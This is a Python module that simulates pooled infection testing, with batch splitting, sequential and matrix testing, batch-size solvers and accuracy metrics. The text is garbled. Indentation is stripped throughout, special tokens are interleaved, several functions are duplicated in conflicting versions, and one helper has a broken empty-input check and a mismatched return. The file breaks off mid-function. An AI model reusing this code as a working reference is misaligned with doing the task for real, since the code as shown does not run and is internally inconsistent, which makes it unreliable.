<|reserved_special_token_0|>
def neg_pos_batch_split(subject_array, batch_size, typeII_error, typeI_error):
"""
    A function gives a list of subjects on the negative batch(es),
    a list of subjects on the positive batch(es) and the test-kit
consumption given the probability of type II error, the
probability of Type I error.
Input:
subject_array (Numpy Array): an array contains subject id and subject's
            condition (1 stands for infection and 0 stands for no infection)
batch_size (int): batch size
typeII_error (float): probability of type II error
typeI_error (float): probability of type I error
Output:
neg_batch (Numpy Array): an array of subjects on the negative batch(es)
        pos_batch (Numpy Array): an array of subjects on the positive batch(es)
test_consum (int): the number of test-kit consumptions
"""
neg_batch = []
pos_batch = []
test_consum = np.ceil(len(subject_array) / batch_size)
random_table = np.random.uniform(0, 1, int(test_consum))
i = 0
for temp_batch in np.array_split(subject_array, test_consum):
if 1 in temp_batch[:, 1]:
if random_table[i] > typeII_error:
pos_batch.append(temp_batch)
else:
neg_batch.append(temp_batch)
elif random_table[i] > typeI_error:
neg_batch.append(temp_batch)
else:
pos_batch.append(temp_batch)
i += 1
    neg_batch = np.concatenate(neg_batch) if len(neg_batch) > 0 else np.array([])
    pos_batch = np.concatenate(pos_batch) if len(pos_batch) > 0 else np.array([])
return neg_batch, pos_batch, test_consum
def helpfunction(subject_array, p, batch_size, typeII_error, typeI_error,
    batch_limit=32):
"""
The helpfunction is a handy function to give the list of subjects on the
    negative batch(es), the list of subjects on the positive batch(es), the
test-kit consumption, the infection rate on the negative batches, the
infection rate on the positive batches, the optimal batch size for
negative batches and the optimal batch size for positive batches.
Input:
subject_array (Numpy Array): an array contains subject id and subject's
            condition (1 stands for infection and 0 stands for no infection)
p (float): Infection rate
batch_size (int): batch size
typeII_error (float): probability of type II error
typeI_error (float): probability of type I error
batch_limit (int): batch size upper limit
Output:
temp0 (Numpy Array): an array of subjects on the negative batch(es)
        temp1 (Numpy Array): an array of subjects on the positive batch(es)
temp_con (int): the number of test-kit consumptions
p0 (float): the infection rate on the negative batches
p1 (float): the infection rate on the positive batches
n0 (float): the optimal batch size for the negative batches
n1 (float): the optimal batch size for the positive batches
"""
batch_size = min(batch_size, batch_limit)
p0 = infection_rate_on_negative_batch(p, batch_size, typeII_error,
typeI_error)
p1 = infection_rate_on_positive_batch(p, batch_size, typeII_error,
typeI_error)
n0 = one_batch_test_int_solver(p0, typeII_error, typeI_error, batch_limit)
n1 = one_batch_test_int_solver(p1, typeII_error, typeI_error, batch_limit)
    if len(subject_array) == 0:
        # empty input: return empty splits and zero test consumption
        return np.array([]), np.array([]), 0, p0, p1, n0, n1
temp0, temp1, temp_con = neg_pos_batch_split(subject_array, batch_size,
typeII_error, typeI_error)
return temp0, temp1, temp_con, p0, p1, n0, n1
def seq_test(subject_array, stop_rule, p, batch_size, typeII_error,
typeI_error, repeat=1, prob_threshold=1, seq=True, batch_limit=32):
"""
A function gives the test results to a subject array and the total number of
test-kit consumption and the individual testing number given the subject array,
the stop rule, the batch size, the probability of type II error, the probability of
    Type I error, and the number of repetitions, the probability threshold, and
setting of sequence testing or not.
Input:
subject_array(Numpy Array): an array contains subject id and subject's
            condition (1 stands for infection and 0 stands for no infection)
        stop_rule (int): the number of positive batches to enter individual testing
p (float): infection rate
batch_size (int): batch size
typeII_error (float): probability of type II error
typeI_error (float): probability of type I error
repeat (int): the number of repetition
prob_threshold (float): if the infection rate of a batch is beyond prob_threshold,
the subjects on that batch will enter individual testing phase
seq (boolean): True stands for sequential testing. The test will end
            when the test result is positive or the number of repetitions is used up.
            False stands for simultaneous testing with majority voting.
        batch_limit (int): the upper limit of the batch size
Output:
result (Numpy Array): an array contains subjects' id and test results
consum (int): the total test consumption
individual_con (int): the test consumption for individual testings
"""
temp_list = []
neg_list = []
pos_list = []
consum = 0
temp = {'data': subject_array, 'NB_Num': 0, 'PB_Num': 0, 'p': p,
'batch_size': batch_size}
temp_list.append(temp)
new_list = []
neg_array = []
pos_array = []
while len(temp_list) > 0:
for i in temp_list:
temp0, temp1, temp_con, p0, p1, n0, n1 = helpfunction(i['data'],
i['p'], i['batch_size'], typeII_error, typeI_error,
batch_limit=batch_limit)
temp0 = {'data': temp0, 'NB_Num': i['NB_Num'] + 1, 'PB_Num': i[
'PB_Num'], 'p': p0, 'batch_size': n0}
temp1 = {'data': temp1, 'NB_Num': i['NB_Num'], 'PB_Num': i[
'PB_Num'] + 1, 'p': p1, 'batch_size': n1}
if len(temp0['data']) > 0:
if temp0['NB_Num'] >= stop_rule:
neg_list.append(temp0)
else:
new_list.append(temp0)
if len(temp1['data']) > 0:
if temp1['PB_Num'] >= stop_rule or temp1['p'
] >= prob_threshold:
pos_list.append(temp1)
else:
new_list.append(temp1)
consum += temp_con
temp_list = new_list
new_list = []
for j in neg_list:
neg_array.append(j['data'])
neg_array = np.concatenate(neg_array)
for k in pos_list:
pos_array.append(k['data'])
pos_array = np.concatenate(pos_array)
neg_array[:, 1] = 0
individual_test, individual_con = conventional_test(pos_array,
typeII_error, typeI_error, repeat, seq)
pos_array = individual_test
consum += individual_con
result = np.concatenate((pos_array, neg_array))
result = result[result[:, 0].argsort()]
result = result.astype('int64')
return result, consum, individual_con
<|reserved_special_token_0|>
def specificity_score(y_true, y_pred):
"""
A function provides specificty given the prediction and the truth
"""
tn, fp, _, _ = confusion_matrix(y_true=y_true, y_pred=y_pred).ravel()
return tn / (tn + fp)
@jit(parallel=True)
def data_gen(size, p):
"""
data_gen provides a faster way to generate a random population with
infection rate p.
Input:
size (int): the size of population
p (float): the infection rate
Output:
test_array (array): the first column is for id and the second column
        is the condition, where 1 stands for infection and 0 stands for no infection
"""
random_table = np.random.binomial(size=size, p=p, n=1)
test_array = np.zeros((size, 2), dtype=int)
for i in range(size):
test_array[i, 0] = i
test_array[i, 1] = random_table[i]
return test_array
def test_result(data, seq_test, **kwargs):
"""
    A helper function that summarises the evaluation results of a given test method with its **kwargs
Input:
data (array or list of arrays)
seq_test (test_method object): could be seq_test, matrix_test and other test_method objects
Output:
result (DataFrame): a dataframe contains important evaluation metrics for the test method
"""
if isinstance(data, list) == False:
pred, consum, ind_con = seq_test(data, **kwargs)
result = {'acc': np.mean(pred[:, 1] == data[:, 1]), 'sens':
recall_score(data[:, 1], pred[:, 1]), 'spec': specificity_score
(data[:, 1], pred[:, 1]), 'PPV': precision_score(data[:, 1],
pred[:, 1]), 'NPV': npv_score(data[:, 1], pred[:, 1]),
'test_consum': consum, 'ind_consum': ind_con, 'batch_consum':
consum - ind_con}
return result
else:
length = len(data)
acc = np.zeros(length)
sens = np.zeros(length)
spec = np.zeros(length)
ppv = np.zeros(length)
npv = np.zeros(length)
test_consum = np.zeros(length)
ind_consum = np.zeros(length)
batch_consum = np.zeros(length)
for i in range(length):
pred, consum, ind_con = seq_test(data[i], **kwargs)
acc[i] = np.mean(pred[:, 1] == data[i][:, 1])
sens[i] = recall_score(data[i][:, 1], pred[:, 1])
spec[i] = specificity_score(data[i][:, 1], pred[:, 1])
ppv[i] = precision_score(data[i][:, 1], pred[:, 1])
npv[i] = npv_score(data[i][:, 1], pred[:, 1])
test_consum[i] = consum
ind_consum[i] = ind_con
batch_consum[i] = consum - ind_con
result = {'acc': acc, 'sens': sens, 'spec': spec, 'PPV': ppv, 'NPV':
npv, 'test_consum': test_consum, 'ind_consum': ind_consum,
'batch_consum': batch_consum}
return pd.DataFrame(result)
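# Usage sketch (illustrative; recall_score / precision_score / npv_score and pandas
# are imported or defined in the elided header above). Replicated populations let
# the strategies be compared on average accuracy and test consumption:
#
#   datasets = [data_gen(10000, 0.01) for _ in range(20)]
#   summary = test_result(datasets, seq_test, stop_rule=2, p=0.01, batch_size=32,
#                         typeII_error=0.05, typeI_error=0.01)
#   summary[['acc', 'sens', 'spec', 'test_consum']].mean()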
<|reserved_special_token_0|>
def parallel_batch_testing(subject_array, batch_size, typeII_error,
typeI_error, parallel_num, ind_repeat, seq):
"""
This function provides the parallel batch testing results for a given subject array.
Input:
subject_array(Numpy Array): an array contains subject id and subject's
            condition (1 stands for infection and 0 stands for no infection)
batch_size (int): batch size
typeII_error (float): probability of type II error
typeI_error (float): probability of type I error
parallel_num (int): the number of parallel testing for the batch testing
ind_repeat (int): the number of potential individual testing for the positive batches
seq (boolean): True stands for sequential testing. The test will end
            when the test result is positive or the number of repetitions is used up.
            False stands for simultaneous testing with majority voting.
Output:
result (Numpy Array): an array contains subjects' id and test results
consum (int): the total test consumption
individual_con (int): the test consumption for individual testings
"""
neg_batch = []
pos_batch = []
batch_consum = np.ceil(len(subject_array) / batch_size) * parallel_num
for temp_batch in np.array_split(subject_array, np.ceil(len(
subject_array) / batch_size)):
random_table = np.random.uniform(0, 1, (1, parallel_num))
if 1 in temp_batch[:, 1]:
if random_table.max() > typeII_error:
pos_batch.append(temp_batch)
else:
neg_batch.append(temp_batch)
elif random_table.min() < typeI_error:
pos_batch.append(temp_batch)
else:
neg_batch.append(temp_batch)
neg_batch = np.concatenate(neg_batch) if len(neg_batch) > 0 else np.array([
])
pos_batch = np.concatenate(pos_batch) if len(pos_batch) > 0 else np.array([
])
neg_batch[:, 1] = 0
individual_test, individual_con = conventional_test(pos_batch,
typeII_error, typeI_error, repeat=ind_repeat, seq=seq)
result = np.concatenate((individual_test, neg_batch))
result = result[result[:, 0].argsort()]
result = result.astype('int64')
return result, batch_consum + individual_con, individual_con
def fixed_batch_seq_test(subject_array, stop_rule, p, batch_size,
typeII_error, typeI_error, repeat, prob_threshold=0.3, seq=True):
"""
This function provides the parallel batch testing results for a given subject array.
Input:
subject_array(Numpy Array): an array contains subject id and subject's
condition (1 stands for infection and 0 stands for uninfection)
stop_rule (int): the number of positive batches to enter the individual testing phase
batch_size (int): batch size
typeII_error (float): probability of type II error
typeI_error (float): probability of type I error
repeat (int): the number of potential individual testing for the positive crossings
prob_threshold (float): if the infection rate of a batch is beyond prob_threshold,
the subjects on that batch will enter individual testing phase
seq (boolean): True stands for sequential testing. The test will end
when the test result is positive or run up the number of repetition.
False stands for simutanlous testing with majority voting.
Output:
result (Numpy Array): an array contains subjects' id and test results
consum (int): the total test consumption
individual_con (int): the test consumption for individual testings
"""
temp_list = []
neg_list = []
pos_list = []
consum = 0
temp = {'data': subject_array, 'NB_Num': 0, 'PB_Num': 0, 'p': p,
'batch_size': batch_size}
temp_list.append(temp)
new_list = []
neg_array = []
pos_array = []
while len(temp_list) > 0:
for i in temp_list:
temp0, temp1, temp_con, p0, p1, n0, n1 = helpfunction(i['data'],
i['p'], i['batch_size'], typeII_error, typeI_error)
temp0 = {'data': np.random.permutation(temp0), 'NB_Num': i[
'NB_Num'] + 1, 'PB_Num': i['PB_Num'], 'p': p0, 'batch_size':
batch_size}
temp1 = {'data': np.random.permutation(temp1), 'NB_Num': i[
'NB_Num'], 'PB_Num': i['PB_Num'] + 1, 'p': p1, 'batch_size':
batch_size}
if len(temp0['data']) > 0:
if temp0['NB_Num'] >= stop_rule:
neg_list.append(temp0)
else:
new_list.append(temp0)
if len(temp1['data']) > 0:
if temp1['PB_Num'] >= stop_rule or temp1['p'
] >= prob_threshold:
pos_list.append(temp1)
else:
new_list.append(temp1)
consum += temp_con
temp_list = new_list
new_list = []
for j in neg_list:
neg_array.append(j['data'])
neg_array = np.concatenate(neg_array)
for k in pos_list:
pos_array.append(k['data'])
pos_array = np.concatenate(pos_array)
neg_array[:, 1] = 0
individual_test, individual_con = conventional_test(pos_array,
typeII_error, typeI_error, repeat, seq)
pos_array = individual_test
consum += individual_con
result = np.concatenate((pos_array, neg_array))
result = result[result[:, 0].argsort()]
result = result.astype('int64')
return result, consum, individual_con
def name_fun(n):
"""
input: stopping rule
output: finish nodes
"""
output = []
temp = ['']
for i in range(2 * n - 1):
temp_cur = []
for j in temp:
candidate_pos = j + '+'
candidate_neg = j + '-'
if str.count(candidate_pos, '+') >= n:
output.append(candidate_pos)
else:
temp_cur.append(candidate_pos)
if str.count(candidate_neg, '-') >= n:
output.append(candidate_neg)
else:
temp_cur.append(candidate_neg)
temp = temp_cur
neg_symbol = [x for x in output if str.count(x, '-') == n]
pos_symbol = [x for x in output if str.count(x, '+') == n]
return output, neg_symbol, pos_symbol
def seq_test_with_node(subject_array, stop_rule, p, batch_size,
typeII_error, typeI_error, repeat=1, prob_threshold=1, seq=True,
batch_limit=32):
"""
A function gives the test results to a subject array and the total number of
test-kit consumption and the individual testing number given the subject array,
the stop rule, the batch size, the probability of type II error, the probability of
Type I error, and the number of repeatition, the probability threshold, and
setting of sequence testing or not.
Input:
subject_array(Numpy Array): an array contains subject id and subject's
condition (1 stands for infection and 0 stands for uninfection)
stop_rule (int): the number of postive batches to enter individual testing
p (float): infection rate
batch_size (int): batch size
typeII_error (float): probability of type II error
typeI_error (float): probability of type I error
repeat (int): the number of repetition
prob_threshold (float): if the infection rate of a batch is beyond prob_threshold,
the subjects on that batch will enter individual testing phase
seq (boolean): True stands for sequential testing. The test will end
when the test result is positive or run up the number of repetition.
False stands for simutanlous testing with majority voting.
batch_limit (int):
Output:
result (Numpy Array): an array contains subjects' id and test results
consum (int): the total test consumption
individual_con (int): the test consumption for individual testings
"""
temp_list = []
neg_list = []
pos_list = []
batch_num_list = []
consum = 0
temp = {'data': subject_array, 'NB_Num': 0, 'PB_Num': 0, 'p': p,
'batch_size': batch_size, 'node': ''}
temp_list.append(temp)
new_list = []
neg_array = []
neg_node = []
pos_node = []
pos_array = []
while len(temp_list) > 0:
for i in temp_list:
temp0, temp1, temp_con, p0, p1, n0, n1 = helpfunction(i['data'],
i['p'], i['batch_size'], typeII_error, typeI_error,
batch_limit=batch_limit)
temp0 = {'data': temp0, 'NB_Num': i['NB_Num'] + 1, 'PB_Num': i[
'PB_Num'], 'p': p0, 'batch_size': n0, 'node': i['node'] + '-'}
temp1 = {'data': temp1, 'NB_Num': i['NB_Num'], 'PB_Num': i[
'PB_Num'] + 1, 'p': p1, 'batch_size': n1, 'node': i['node'] +
'+'}
if len(temp0['data']) > 0:
if temp0['NB_Num'] >= stop_rule:
neg_list.append(temp0)
else:
new_list.append(temp0)
if len(temp1['data']) > 0:
if temp1['PB_Num'] >= stop_rule or temp1['p'
] >= prob_threshold:
pos_list.append(temp1)
else:
new_list.append(temp1)
consum += temp_con
batch_num_list.append(consum)
temp_list = new_list
new_list = []
for j in neg_list:
neg_array.append(j['data'])
temp = [[x, j['node']] for x in j['data'][:, 0]]
neg_node.append(temp)
neg_array = np.concatenate(neg_array)
for k in pos_list:
pos_array.append(k['data'])
temp = [[x, k['node']] for x in k['data'][:, 0]]
pos_node.append(temp)
pos_array = np.concatenate(pos_array)
neg_array[:, 1] = 0
individual_test, individual_con = conventional_test(pos_array,
typeII_error, typeI_error, repeat, seq)
pos_array = individual_test
consum += individual_con
result = np.concatenate((pos_array, neg_array))
pos_node.extend(neg_node)
node = pos_node
node = sum(node, [])
node.sort()
node = [x[1] for x in node]
result = result[result[:, 0].argsort()]
result = result.astype('int64')
return result, consum, individual_con, node, batch_num_list
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@jit(parallel=True)
def conventional_test(subject_array, typeII_error, typeI_error, repeat=1,
seq=True):
"""
A function gives the test results to a subject array given the probability of
type II error, the probability of Type I error, and the number of repeatition,
and setting of sequence testing or not.
Input:
subject_array(Numpy Array): an array contains subject id and subject's
condition (1 stands for infection and 0 stands for uninfection)
typeII_error (float): probability of type II error
typeI_error (float): probability of type I error
repeat (int): the number of repetition
seq (boolean): True stands for sequential testing. The test will end
when the test result is positive or run up the number of repetition.
False stands for simutanlous testing with majority voting.
Output:
test_result (Numpy Array): an array contains subjects' id and test results
consum (int): the total test consumption
"""
if seq == True:
consum = 0
test_result = np.zeros(subject_array.shape, dtype=int)
random_table = np.random.uniform(0, 1, (subject_array.shape[0], repeat)
)
for i in range(len(subject_array)):
temp = 0
j = 0
subject = subject_array[i, 1]
while j < repeat and temp == 0:
random_num = random_table[i, j]
consum += 1
if subject == 1:
temp = 1 if random_num > typeII_error else 0
else:
temp = 1 if random_num < typeI_error else 0
j += 1
test_result[i, 0] = subject_array[i, 0]
test_result[i, 1] = temp
return test_result, consum
else:
test_result = np.zeros(subject_array.shape, dtype=int)
random_table = np.random.uniform(0, 1, (subject_array.shape[0], repeat)
)
for i in range(len(subject_array)):
temp = 0
for j in range(repeat):
temp_random = random_table[i, j]
if subject_array[i, 1] == 1:
temp_1 = 1 if temp_random > typeII_error else 0
elif subject_array[i, 1] == 0:
temp_1 = 1 if temp_random < typeI_error else 0
temp += temp_1
temp = 1 if temp >= repeat / 2 else 0
test_result[i, 0] = subject_array[i, 0]
test_result[i, 1] = temp
return test_result, len(subject_array) * repeat
@njit(parallel=True)
def parallel_test(subject_array, typeII_error, typeI_error, num):
test_result = np.zeros(subject_array.shape, dtype=int)
random_table = np.random.uniform(0, 1, (subject_array.shape[0], num))
for i in range(len(subject_array)):
subject = subject_array[i, 1]
if subject == 1:
temp = 1 if max(random_table[i, :]) > typeII_error else 0
elif subject == 0:
temp = 1 if min(random_table[i, :]) < typeI_error else 0
test_result[i, 0] = subject_array[i, 0]
test_result[i, 1] = temp
return test_result, len(subject_array) * num, len(subject_array) * num
def infection_rate_on_negative_batch(p, batch_size, typeII_error, typeI_error):
"""
Given infection rate, batch size, prob of type II error and prob of type I error, this
function gives the infection rate on the negative batch.
Input:
p (float): the infection rate
batch_size (int): the batch size
typeII_error (float): the prob of type II error
typeI_error (float): the prob of type I error
Output:
(float): the infection rate on the negative batch
"""
q = 1 - p
r = typeII_error * (1 - q ** batch_size) / ((1 - typeI_error) * q **
batch_size + typeII_error * (1 - q ** batch_size))
return p * r / (1 - q ** batch_size)
def infection_rate_on_positive_batch(p, batch_size, typeII_error, typeI_error):
"""
Given infection rate, batch size, prob of type II error and prob of type I error, this
function gives the infection rate on the positive batch.
Input:
p (float): the infection rate
batch_size (int): the batch size
typeII_error (float): the prob of type II error
typeI_error (float): the prob of type I error
Output:
(float): the infection rate on the positive batch
"""
q = 1 - p
r = (1 - typeII_error) * (1 - q ** batch_size) / (typeI_error * q **
batch_size + (1 - typeII_error) * (1 - q ** batch_size))
return p * r / (1 - q ** batch_size)
def one_batch_test_solver(prevalence_rate, typeII_error, typeI_error,
n_initial_guess=2):
"""
A function gives (float) the best batch size for one batch test given the infection rate
Inputs:
prevalence_rate(float): infection rate
typeII_error(float): the prob of type II error
typeI_error(float): the prob of type I error
n_initial_guess(float): the initial guess
Output:
(float): the optimal batch size
"""
q = 1 - prevalence_rate
func = lambda n: n * q ** (n / 2) - (-(1 - typeII_error - typeI_error) *
np.log(q)) ** (-1 / 2)
n_solution = fsolve(func, n_initial_guess)
return float(n_solution)
def one_batch_test_int_solver(prevalence_rate, typeII_error, typeI_error,
batch_limit, n_initial_guess=2):
"""
A function gives (int) the best batch size for one batch test given the infection rate
Inputs:
prevalence_rate(float): infection rate
n_initial_guess(float): the initial guess
typeII_error(float): the prob of type II error
typeI_error(float): the prob of type I error
n_initial_guess:
batch_limit (int): the upper limit of batch size
Output:
(int): the optimal batch size
"""
sol_float = one_batch_test_solver(prevalence_rate, typeII_error,
typeI_error, n_initial_guess)
floor, ceil = np.floor(sol_float), np.ceil(sol_float)
func = lambda batch_size: 1 / batch_size + 1 - typeII_error - (1 -
typeII_error - typeI_error) * (1 - prevalence_rate) ** batch_size
if func(floor) < func(ceil):
temp = int(floor)
else:
temp = int(ceil)
if temp <= batch_limit:
return temp
else:
return int(batch_limit)
def neg_pos_batch_split(subject_array, batch_size, typeII_error, typeI_error):
"""
A function gives a list of sujects on the negative batch(es),
a list of subjects on the postive batch(es) and the test-kit
consumption given the probability of type II error, the
probability of Type I error.
Input:
subject_array (Numpy Array): an array contains subject id and subject's
condition (1 stands for infection and 0 stands for uninfection)
batch_size (int): batch size
typeII_error (float): probability of type II error
typeI_error (float): probability of type I error
Output:
neg_batch (Numpy Array): an array of subjects on the negative batch(es)
pos_batch (Numpy Array): an array of subjects on the postive batch(es)
test_consum (int): the number of test-kit consumptions
"""
neg_batch = []
pos_batch = []
test_consum = np.ceil(len(subject_array) / batch_size)
random_table = np.random.uniform(0, 1, int(test_consum))
i = 0
for temp_batch in np.array_split(subject_array, test_consum):
if 1 in temp_batch[:, 1]:
if random_table[i] > typeII_error:
pos_batch.append(temp_batch)
else:
neg_batch.append(temp_batch)
elif random_table[i] > typeI_error:
neg_batch.append(temp_batch)
else:
pos_batch.append(temp_batch)
i += 1
neg_batch = np.concatenate(neg_batch) if len(neg_batch) > 0 else np.array([
])
pos_batch = np.concatenate(pos_batch) if len(pos_batch) > 0 else np.array([
])
return neg_batch, pos_batch, test_consum
def helpfunction(subject_array, p, batch_size, typeII_error, typeI_error,
batch_limit):
"""
The helpfunction is a handy function to give the list of subjects on the
negative batch(es), the list of subjects on the postive batch(es), the
test-kit consumption, the infection rate on the negative batches, the
infection rate on the positive batches, the optimal batch size for
negative batches and the optimal batch size for positive batches.
Input:
subject_array (Numpy Array): an array contains subject id and subject's
condition (1 stands for infection and 0 stands for uninfection)
p (float): Infection rate
batch_size (int): batch size
typeII_error (float): probability of type II error
typeI_error (float): probability of type I error
batch_limit (int): batch size upper limit
Output:
temp0 (Numpy Array): an array of subjects on the negative batch(es)
temp1 (Numpy Array): an array of subjects on the postive batch(es)
temp_con (int): the number of test-kit consumptions
p0 (float): the infection rate on the negative batches
p1 (float): the infection rate on the positive batches
n0 (float): the optimal batch size for the negative batches
n1 (float): the optimal batch size for the positive batches
"""
batch_size = min(batch_size, batch_limit)
p0 = infection_rate_on_negative_batch(p, batch_size, typeII_error,
typeI_error)
p1 = infection_rate_on_positive_batch(p, batch_size, typeII_error,
typeI_error)
n0 = one_batch_test_int_solver(p0, typeII_error, typeI_error, batch_limit)
n1 = one_batch_test_int_solver(p1, typeII_error, typeI_error, batch_limit)
if subject_array == np.array([]):
return np.array([]), np.array([]), p0, p1, n0, n1
temp0, temp1, temp_con = neg_pos_batch_split(subject_array, batch_size,
typeII_error, typeI_error)
return temp0, temp1, temp_con, p0, p1, n0, n1
def seq_test(subject_array, stop_rule, p, batch_size, typeII_error,
typeI_error, repeat=1, prob_threshold=1, seq=True, batch_limit=32):
"""
A function gives the test results to a subject array and the total number of
test-kit consumption and the individual testing number given the subject array,
the stop rule, the batch size, the probability of type II error, the probability of
Type I error, and the number of repeatition, the probability threshold, and
setting of sequence testing or not.
Input:
subject_array(Numpy Array): an array contains subject id and subject's
condition (1 stands for infection and 0 stands for uninfection)
stop_rule (int): the number of postive batches to enter individual testing
p (float): infection rate
batch_size (int): batch size
typeII_error (float): probability of type II error
typeI_error (float): probability of type I error
repeat (int): the number of repetition
prob_threshold (float): if the infection rate of a batch is beyond prob_threshold,
the subjects on that batch will enter individual testing phase
seq (boolean): True stands for sequential testing. The test will end
when the test result is positive or run up the number of repetition.
False stands for simutanlous testing with majority voting.
batch_limit (int):
Output:
result (Numpy Array): an array contains subjects' id and test results
consum (int): the total test consumption
individual_con (int): the test consumption for individual testings
"""
temp_list = []
neg_list = []
pos_list = []
consum = 0
temp = {'data': subject_array, 'NB_Num': 0, 'PB_Num': 0, 'p': p,
'batch_size': batch_size}
temp_list.append(temp)
new_list = []
neg_array = []
pos_array = []
while len(temp_list) > 0:
for i in temp_list:
temp0, temp1, temp_con, p0, p1, n0, n1 = helpfunction(i['data'],
i['p'], i['batch_size'], typeII_error, typeI_error,
batch_limit=batch_limit)
temp0 = {'data': temp0, 'NB_Num': i['NB_Num'] + 1, 'PB_Num': i[
'PB_Num'], 'p': p0, 'batch_size': n0}
temp1 = {'data': temp1, 'NB_Num': i['NB_Num'], 'PB_Num': i[
'PB_Num'] + 1, 'p': p1, 'batch_size': n1}
if len(temp0['data']) > 0:
if temp0['NB_Num'] >= stop_rule:
neg_list.append(temp0)
else:
new_list.append(temp0)
if len(temp1['data']) > 0:
if temp1['PB_Num'] >= stop_rule or temp1['p'
] >= prob_threshold:
pos_list.append(temp1)
else:
new_list.append(temp1)
consum += temp_con
temp_list = new_list
new_list = []
for j in neg_list:
neg_array.append(j['data'])
neg_array = np.concatenate(neg_array)
for k in pos_list:
pos_array.append(k['data'])
pos_array = np.concatenate(pos_array)
neg_array[:, 1] = 0
individual_test, individual_con = conventional_test(pos_array,
typeII_error, typeI_error, repeat, seq)
pos_array = individual_test
consum += individual_con
result = np.concatenate((pos_array, neg_array))
result = result[result[:, 0].argsort()]
result = result.astype('int64')
return result, consum, individual_con
<|reserved_special_token_0|>
def specificity_score(y_true, y_pred):
"""
A function provides specificty given the prediction and the truth
"""
tn, fp, _, _ = confusion_matrix(y_true=y_true, y_pred=y_pred).ravel()
return tn / (tn + fp)
@jit(parallel=True)
def data_gen(size, p):
"""
data_gen provides a faster way to generate a random population with
infection rate p.
Input:
size (int): the size of population
p (float): the infection rate
Output:
test_array (array): the first column is for id and the second column
is the condition, where 1 stands for infection and 0 stands for uninfection
"""
random_table = np.random.binomial(size=size, p=p, n=1)
test_array = np.zeros((size, 2), dtype=int)
for i in range(size):
test_array[i, 0] = i
test_array[i, 1] = random_table[i]
return test_array
def test_result(data, seq_test, **kwargs):
"""
a helper function provides convenient results for a given test method with its **kwargs
Input:
data (array or list of arrays)
seq_test (test_method object): could be seq_test, matrix_test and other test_method objects
Output:
result (DataFrame): a dataframe contains important evaluation metrics for the test method
"""
if isinstance(data, list) == False:
pred, consum, ind_con = seq_test(data, **kwargs)
result = {'acc': np.mean(pred[:, 1] == data[:, 1]), 'sens':
recall_score(data[:, 1], pred[:, 1]), 'spec': specificity_score
(data[:, 1], pred[:, 1]), 'PPV': precision_score(data[:, 1],
pred[:, 1]), 'NPV': npv_score(data[:, 1], pred[:, 1]),
'test_consum': consum, 'ind_consum': ind_con, 'batch_consum':
consum - ind_con}
return result
else:
length = len(data)
acc = np.zeros(length)
sens = np.zeros(length)
spec = np.zeros(length)
ppv = np.zeros(length)
npv = np.zeros(length)
test_consum = np.zeros(length)
ind_consum = np.zeros(length)
batch_consum = np.zeros(length)
for i in range(length):
pred, consum, ind_con = seq_test(data[i], **kwargs)
acc[i] = np.mean(pred[:, 1] == data[i][:, 1])
sens[i] = recall_score(data[i][:, 1], pred[:, 1])
spec[i] = specificity_score(data[i][:, 1], pred[:, 1])
ppv[i] = precision_score(data[i][:, 1], pred[:, 1])
npv[i] = npv_score(data[i][:, 1], pred[:, 1])
test_consum[i] = consum
ind_consum[i] = ind_con
batch_consum[i] = consum - ind_con
result = {'acc': acc, 'sens': sens, 'spec': spec, 'PPV': ppv, 'NPV':
npv, 'test_consum': test_consum, 'ind_consum': ind_consum,
'batch_consum': batch_consum}
return pd.DataFrame(result)
def matrix_test(subject_array, side_length, typeII_error, typeI_error,
sq_repeat=1, ind_repeat=1, seq=True):
"""
This function provides the matrix testing results for a given subject array.
Input:
subject_array(Numpy Array): an array contains subject id and subject's
condition (1 stands for infection and 0 stands for uninfection)
side_length (int): the side length of the matrix testing
typeII_error (float): probability of type II error
typeI_error (float): probability of type I error
sq_repeat (int): the number of parallel testing for the column/row batch testing
ind_repeat (int): the number of potential individual testing for the positive crossings
seq (boolean): True stands for sequential testing. The test will end
when the test result is positive or run up the number of repetition.
False stands for simutanlous testing with majority voting.
Output:
result (Numpy Array): an array contains subjects' id and test results
consum (int): the total test consumption
individual_con (int): the test consumption for individual testings
"""
matrix_test_num = len(subject_array) // side_length ** 2
matrix_test_array = subject_array[0:matrix_test_num * side_length ** 2, :]
ind_test_array = subject_array[matrix_test_num * side_length ** 2:, :]
ind_idx = []
for temp_batch in np.array_split(matrix_test_array, matrix_test_num):
temp_batch = temp_batch.reshape(side_length, side_length, 2)
temp_row = []
temp_col = []
random_num_row = np.random.uniform(0, 1, sq_repeat)
random_num_col = np.random.uniform(0, 1, sq_repeat)
for i in range(side_length):
if 1 in temp_batch[i, :, 1]:
if max(random_num_row) > typeII_error:
temp_row.append(temp_batch[i, :, 0])
elif min(random_num_row) < typeI_error:
temp_row.append(temp_batch[i, :, 0])
if 1 in temp_batch[:, i, 1]:
if max(random_num_col) > typeII_error:
temp_col.append(temp_batch[:, i, 0])
elif min(random_num_col) < typeI_error:
temp_col.append(temp_batch[:, i, 0])
ind_idx.append(np.intersect1d(temp_row, temp_col))
ind_idx = np.concatenate(ind_idx)
ind_idx = ind_idx.astype('int')
if len(ind_idx) == 0:
neg_array = matrix_test_array
else:
mask = np.zeros(subject_array.shape[0], dtype=bool)
mask[ind_idx] = True
mask[matrix_test_num * side_length ** 2:] = True
ind_test_array = subject_array[mask, :]
neg_array = subject_array[~mask, :]
neg_array[:, 1] = 0
ind_test, ind_con = conventional_test(ind_test_array, typeII_error,
typeI_error, repeat=ind_repeat, seq=seq)
batch_test_num = matrix_test_num * 2 * side_length * sq_repeat
result = np.concatenate((neg_array, ind_test))
result = result[result[:, 0].argsort()]
return result, batch_test_num + ind_con, ind_con
def parallel_batch_testing(subject_array, batch_size, typeII_error,
typeI_error, parallel_num, ind_repeat, seq):
"""
This function provides the parallel batch testing results for a given subject array.
Input:
subject_array(Numpy Array): an array contains subject id and subject's
condition (1 stands for infection and 0 stands for uninfection)
batch_size (int): batch size
typeII_error (float): probability of type II error
typeI_error (float): probability of type I error
parallel_num (int): the number of parallel testing for the batch testing
ind_repeat (int): the number of potential individual testing for the positive batches
seq (boolean): True stands for sequential testing. The test will end
when the test result is positive or run up the number of repetition.
False stands for simutanlous testing with majority voting.
Output:
result (Numpy Array): an array contains subjects' id and test results
consum (int): the total test consumption
individual_con (int): the test consumption for individual testings
"""
neg_batch = []
pos_batch = []
batch_consum = np.ceil(len(subject_array) / batch_size) * parallel_num
for temp_batch in np.array_split(subject_array, np.ceil(len(
subject_array) / batch_size)):
random_table = np.random.uniform(0, 1, (1, parallel_num))
if 1 in temp_batch[:, 1]:
if random_table.max() > typeII_error:
pos_batch.append(temp_batch)
else:
